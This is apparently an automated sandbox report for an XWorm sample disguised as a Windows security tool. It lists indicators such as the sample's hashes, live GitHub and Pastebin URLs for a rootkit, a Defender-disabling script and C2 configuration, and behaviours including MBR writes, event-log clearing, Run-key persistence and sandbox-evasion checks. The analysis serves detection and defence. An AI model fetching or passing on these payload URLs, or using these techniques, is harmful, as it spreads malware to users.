Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
250s -
max time network
257s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 22:49
Behavioral task
behavioral1
Sample
Credential Guard & VBS Key Isolation.exe
Resource
win10v2004-20250217-en
Errors
General
-
Target
Credential Guard & VBS Key Isolation.exe
-
Size
55KB
-
MD5
dac20ddb2cfb3cb89ce5bcd907c796df
-
SHA1
84ec40d9a683ed62a25f8e1e570b0a2ee3987af0
-
SHA256
9a727d5cfc4c67cb0d3c0f8195087042fd04b83bb29cbe0c0439a4094a2adfc7
-
SHA512
5a3199f76bc18eb20a1e9e7d0bdbadbff3deaa06ec00b3aee33360f1497cc22ae0bc1a125aeaadcef1647c5f03cb386bfbc62375ca5e70ac57c01168043c8762
-
SSDEEP
768:iPZlFQ+v3HM88U6lB5hNfLShjqmEsbYt+UcYzF6t/X62GJhJOZouejI:iPK+vMhHatbYZJzG/gbOGu7
Malware Config
Extracted
https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
xworm
-
Install_directory
%port%
-
install_file
svchost.exe
-
pastebin_url
https://pastebin.com/raw/J42c6s7r
Signatures
-
Detect Xworm Payload 7 IoCs
resource yara_rule behavioral1/memory/2748-1-0x0000000000F20000-0x0000000000F34000-memory.dmp family_xworm behavioral1/memory/2748-634-0x000000001CFE0000-0x000000001CFF2000-memory.dmp family_xworm behavioral1/files/0x000e000000023be1-795.dat family_xworm behavioral1/memory/5168-805-0x0000000000320000-0x0000000000334000-memory.dmp family_xworm behavioral1/memory/4572-947-0x0000000000170000-0x0000000000184000-memory.dmp family_xworm behavioral1/memory/3660-985-0x00000000007F0000-0x0000000000804000-memory.dmp family_xworm behavioral1/memory/4360-1024-0x0000000000460000-0x0000000000474000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5244 created 644 5244 MasonRootkit.exe 5 -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 28 5812 powershell.exe 30 5812 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5812 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 30 5812 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation Credential Guard & VBS Key Isolation.exe Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation MasonRootkit.exe -
Executes dropped EXE 7 IoCs
pid Process 2644 MasonRootkit.exe 5244 MasonRootkit.exe 1780 Knuckles.exe 5168 Credential Guard & VBS Key Isolation.exe 4572 Credential Guard & VBS Key Isolation.exe 3660 Credential Guard & VBS Key Isolation.exe 4360 Credential Guard & VBS Key Isolation.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Credential Guard & VBS Key Isolation = "C:\\Users\\Admin\\AppData\\Roaming\\Credential Guard & VBS Key Isolation.exe" Credential Guard & VBS Key Isolation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 33 pastebin.com 34 pastebin.com 43 raw.githubusercontent.com 29 raw.githubusercontent.com 30 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Knuckles.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5244 set thread context of 1992 5244 MasonRootkit.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Knuckles.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5672 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\2a88e0cd_0 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\2a88e0cd_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_8086&dev_0022&subsys_80860022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\Knuckles.exe%b{00000000-0000-0000-0000-000000000000}" svchost.exe -
Modifies data under HKEY_USERS 22 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={4716907A-E266-4403-9FD6-9DC7734AE833}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00184012963080C5" mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184012963080C5 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000013e599f43fb9be4cbaf1b79b47ff08a60000000002000000000010660000000100002000000052af8299d97eeb57cda804d448b0397b83b98bcb8616b72fc15fd7fdf3e9c0f5000000000e8000000002000020000000c5e60c80a7b1202c201dd9b00e334d6f1b5b0ac0f3637977805199f38b28c1fd800000007a66e3cde10313827e9d4324c3714f5d9ca2d6dcd0a760d129cfefd523e3d61f4f52dd42d2aaadb7683f55810b4d3d8caf4d55d0f587033f1596a84b57c4480a37fa3da4c942e042721e1154578729e8571c3a90725262685bb6333b5811043bcacbdcadba8c31735a5d242ed5bdf2f7dbffa5d9462c654cc3ac8f70c808a5c0400000002ca350f7cfb6d4af79ac289b6959347c4df4552ba262313c25015820a347437c30f3b48b3838e1debc92f6cc13469274e42e220b87a88dc00ce64a8efc0074ba mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000013e599f43fb9be4cbaf1b79b47ff08a600000000020000000000106600000001000020000000bfe31d630f584c26d82e6f023ce11c2a7d29c3627900ee596614df35a2e35f90000000000e80000000020000200000007819d4b82c404cf0eed16b0bb2ecb35de6d56e403b8b63d35ea184ba8c4c178310060000859e5fbaff9c9967069059a22c740b18be94d0b5b083c2df61d3989a412a2083c2fce1121f93fb9bdad3c758900aa8a2ca01284bf675579bfd1a692706b7ef7ed8119cb8fa1b8a582d4878f87b2f4509e52a11a6f4ec31003b89af8f5f8e9947efb7bc8bf5622a48569a904a33edb7b2b1dc9c06ffe5859b93039f1372f0eaba8f743cfbda5ea970003e112db8b415fb0d0acdb18d47bb17698fadbd5d447b01afbf5f89a5da8f4befc6d632826f8ac855c6d2948207e9d5961383ebf4193d1559e13260314a9d219aa17bad1e01c5abf1eefa6dbaf351b7ea00542813a8ce0fad594840582a4c54e7ea662f34c6f761bdf50f69a2813e2293ebaf6fcae7e0d08d32b7254ec0d3e70f0254b6a16c5c643ff8abf479912ba1a67ae06ead35f5110d72ca9ea8a5cadb19f485d8ae1fe0f18c3cb79b172ea5edf8208e0fa2f555f473459e72805414ff5209639b7db87e88450cb958f3a006016ff79a3d75aaf31fe7b779cf452812faf98ed3a2cc7d92cc1e74612ec5b5ae300153049483bedaaf01329c514b8b53b0bec444f4e9024f8e7acdd4b4de3cdb1a38b8837f9c68f2aead9ce927e86bb8b85f13ad19e4c141d83272687cbd67d543e27a15c96ac987cefe3d026e30731f976ee144c666a90c5c6965f6f876484a23a409caadcbeebaa89ba49af63c5f2b95ae45ac7fe36f74b4050668a73bc78b27aa1e26ed89e25f1aa6f90757f8b6dec16f30630cfc7e73ba8562577b677f5f7b33b8e3b41404688682c60effab3808a1880152938b971b328516ab06ba7162c36222b17f78d1ec0c5c61a688a3e04d7a0009966bbf0fb24f125e88863f879e75bf9708f155ab6d0af32dcdd194ac36efbd06652f3463de45fce9f4dc13557e5c91242b6c7bd06eb907fa3970e832dfaf0c9fc8c3ff2577d5b4c361cb1bc27ffebae1db239d568c77e2f8ab9ea7d4410c59efb9c02b2f8d4598e8707bb334bb6aa9563258806e11bd4d87c265f919d4e40954e3f7231a7318f5560004686874c455e867898f3ac7426758d3859eb4701601251e2a3f3a0964af5167ad2e41eeac75035df07e4d7a3f26bf8c1e310d710617f32f8b401c521c7660484d036c60d24cade280aacdf393cf6e65b97de0a5322c61e7976d96e6b4746991834f2178f075e08c086770b41251ba3aeefc4df0bdc46a6c622be47b9edd80790e84b8bc98ba2c5725387b8650cdfd8738b5a3019133858f26225a8356e6414a7251c4d34679fe45a58aef625ab3443f92ca15b5872794b978e4eca128e2da2ede83a9e3342f59764504787e1783ae8353220f541212a85352a6d009cd558aabcbb5cebc8e49496d45337556e37925264645083d6ddbd03db6493ea2790eed43a5dbfb915ee362b3532a22e89d23981f253ec4e1dabc13b2d8de885595b03f0c03bfe65bd9403c8340fc9545a0a2952408b3e55ad973ec7c069a4d29671b33b0110cd62467d565eff193367419d6d1a0c9d73b9ea06767c62015a5cf73bc3429b95995ebfd505eb48272df7c9ed81ddd2aa9b26240ada936fe3af1fa383d53973f8058508cfb22b5cd548f23db3dd379b8987804e006b9b96e327cb7a4f66e47206f2c18fd18bf8dd1c04008ff446ca74e4734a995080479e4bcb06d97970a24ab14b61c52b8e4ae437ef62bfe7c110da63f7aff032f175a23e10a02276efc2b517697e6960f8241bf1cd9df56cb14a7090e503a66d3df6895a5cd48a7a57a71bedeafe2ac150b460f835940524b458abf192e9b37aacc78e050402727853b1df9435ce5a0d854bf8d9f5b07d7ed0cf5b7afe914fe6f10ad99bddc837395971a3a09c5fd52d2d1cbd99a1795880850f2a2bbeaa01817a0e985c4fcdfcbd4bb505748deb55c36fac4cf8c2b3a01315d5d8f29ca1a65da5cbe00464227fcef002ee17c22e789047105676274ec55f113685b4d84d2726fb3281c0b94f1caa3f710cacd386aecfcd66c9c956f5bdbccaba8c61a494c4f129b62d70b74dd064428748fd48a3547fbeaf255eb2dda7dd8c4b86f73c8ca35bc13673c46ce1a77aeff8aec0a9a30d13bf052dcad7c5d12c9fa9b3cb8d63915f5c5b8ab3b557794da6a19d3158ce541bf04b191a0a25fc9f340d9fd34fdf6187c50ee6a1af151be0897bed4fd0b86a937beee1e2ce4c011bcb4233e5983cb45cd2f726108e4c2904000000029748cf20b34ca924ef4050fc918e67d9581533ad22cfde8e819bf44c867d0963831dcd602bff07ca716a517215df283fce01fea21a4bfe9b5db31e4620d73ca mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741474260" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184012963080C5" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 08 Mar 2025 22:51:01 GMT" OfficeClickToRun.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03423d1b-2958-46dd = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b60e0ae9-c5c6-4e19 = c4ce726d7c90db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14aa5135-c1ed-42f7 = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\13f198da9be9c777210b92fc8f213f8aa89ab6bed93a764cd67fc738075f1811" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b863a62a-5577-45ae RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06f98674-c7ef-4803 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\251670ff-6593-42a0 = 89a9456e7c90db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\251670ff-6593-42a0 = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\13f198da9be9c777210b92fc8f213f8aa89ab6bed93a764cd67fc738075f1811" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\900daa0d-46aa-4fe9 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14aa5135-c1ed-42f7 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\df8b772704665936e1d2d6b39df3aa3a9e1b1038cccfaaa1e730dbe447056622" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e4a769c7-0984-4629 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f967ccb-2281-4a2e = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f967ccb-2281-4a2e = "\\\\?\\Volume{241E003F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cc2bda6cf7b34d96dce3ac47661de2608ac5c1eb96a3c7d4e6be9801c688fc5f" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b60e0ae9-c5c6-4e19 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\251670ff-6593-42a0 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local 